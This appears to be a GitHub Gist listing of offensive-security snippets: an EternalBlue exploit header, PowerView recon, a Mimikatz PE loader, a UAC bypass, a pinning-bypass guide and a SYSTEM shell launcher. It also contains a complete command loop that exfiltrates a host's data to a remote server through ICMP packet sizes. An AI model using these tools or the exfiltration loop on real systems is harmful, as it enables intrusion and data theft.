Skip to content

Instantly share code, notes, and snippets.

View filipesam's full-sized avatar

filipesam

20 followers · 66 following
View GitHub Profile
@mgeeky
mgeeky / msfvenom-reverse-tcp-WaitForSingleObject.md
Last active January 16, 2025 19:33
(OSCE/CTP, Module #3: Backdooring PE Files) Document explaining how to locate WaitForSingleObject(..., INFINITE) within msfvenom's (4.12.23-dev) generated payload and how to fix the payload's glitches.

Looking for WaitForSingleObject call within modern msfvenom generated payload.

Abstract

This is a document explaining how to locate WaitForSingleObject(..., INFINITE) within msfvenom's (4.12.23-dev) generated payload and how to fix the payload's glitches. It goes through the analysis of a windows/shell_reverse_tcp payload, touching issues like stack alignment, WaitForSingleObject locating & patching. It has been written when I realised there are many topics on the Offensive-Security OSCE/CTP forums touching problem of finding this particular Windows API. Since RE is one of my stronger FU's I decided to write down my explanation of the subject.

Contents:

@worawit
worawit / eternalblue8_exploit.py
Last active March 16, 2024 18:38
Eternalblue exploit for Windows 8/2012
#!/usr/bin/python
# This file has no update anymore. Please see https://github.com/worawit/MS17-010
from impacket import smb, ntlm
from struct import pack
import sys
import socket
'''
EternalBlue exploit for Windows 8 and 2012 by sleepya
The exploit might FAIL and CRASH a target system (depended on what is overwritten)
@HarmJ0y
HarmJ0y / PowerView-3.0-tricks.ps1
Last active April 12, 2025 06:07
PowerView-3.0 tips and tricks
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
@jobertabma
jobertabma / icmp.md
Last active September 14, 2022 15:02
Commands to exfiltrate command output via ICMP packet size
  1. Capture ICMP packets on your server:
tcpdump -nni eth0 -e icmp[icmptype] == 8 -w output.cap
  1. Send ICMP packets to your server with each byte stored in the packet size, execute this on the remote machine:
ip=vm03;output=`hostname`;for ((i=0;i<${#output};i++));do; ping -c 1 -s `printf '%d\n' "'${output:$i:1}'"` $ip;done
@xorrior
xorrior / PELoader.cs
Created July 12, 2017 01:54
Reflective PE Loader - Compressed Mimikatz inside of InstallUtil
using System;
using System.IO;
using System.IO.Compression;
using System.Text;
using System.Collections.Generic;
using System.Configuration.Install;
using System.Runtime.InteropServices;
@mbrownnycnyc
mbrownnycnyc / android_apk_cert_pinning_mitm.txt
Last active March 18, 2023 03:32
Android APK cert pinning removal and MiTM - focusing on Sense Home Energy Monitor APK
https://dl.google.com/android/repository/tools_r25.2.3-windows.zip
https://medium.com/@felipecsl/bypassing-certificate-pinning-on-android-for-fun-and-profit-1b0d14beab2b#.pnph846be
http://www.security-assessment.com/files/documents/whitepapers/Bypassing%20SSL%20Pinning%20on%20Android%20via%20Reverse%20Engineering.pdf
https://stackoverflow.com/questions/64364407/app-not-installing-in-android-11-but-works-on-previous-versions
1) download apktool and the build tools (http://androidsdkoffline.blogspot.com/p/android-sdk-build-tools.html) and platform tools (https://developer.android.com/studio/releases/platform-tools.html)
"C:\Users\mbrown\Desktop\Sense APK\apktool" d base.apk
@curi0usJack
curi0usJack / .htaccess
Last active April 9, 2025 16:33
FYI THIS IS NO LONGER AN .HTACCESS FILE. SEE COMMENTS BELOW. DON'T WORRY, IT'S STILL EASY.
#
# TO-DO: set |DESTINATIONURL| below to be whatever you want e.g. www.google.com. Do not include "http(s)://" as a prefix. All matching requests will be sent to that url. Thanks @Meatballs__!
#
# Note this version requires Apache 2.4+
#
# Save this file into something like /etc/apache2/redirect.rules.
# Then in your site's apache conf file (in /etc/apache2/sites-avaiable/), put this statement somewhere near the bottom
#
# Include /etc/apache2/redirect.rules
#
@hannob
hannob / infineon-roca.md
Last active February 12, 2025 22:06
Affected Products and Keys by Infineon RSA vulnerability
@masthoon
masthoon / SystemCMD.cpp
Last active October 3, 2024 18:16
Launch SYSTEM CMD in user current session (from a service)
#include "stdafx.h"
#include <windows.h>
#include <Winbase.h>
#include <Wtsapi32.h>
#include <Userenv.h>
#include <malloc.h>
#pragma comment(lib, "Wtsapi32.lib")
#pragma comment(lib, "Userenv.lib")
@hfiref0x
hfiref0x / akagi_42b.c
Last active February 14, 2024 11:56
UAC bypass using FwCplLua COM interface and HKCU mscfile registry entry hijack
typedef interface IFwCplLua IFwCplLua;
typedef struct IFwCplLuaInterfaceVtbl {
BEGIN_INTERFACE
HRESULT(STDMETHODCALLTYPE *QueryInterface)(
__RPC__in IFwCplLua * This,
__RPC__in REFIID riid,
_COM_Outptr_ void **ppvObject);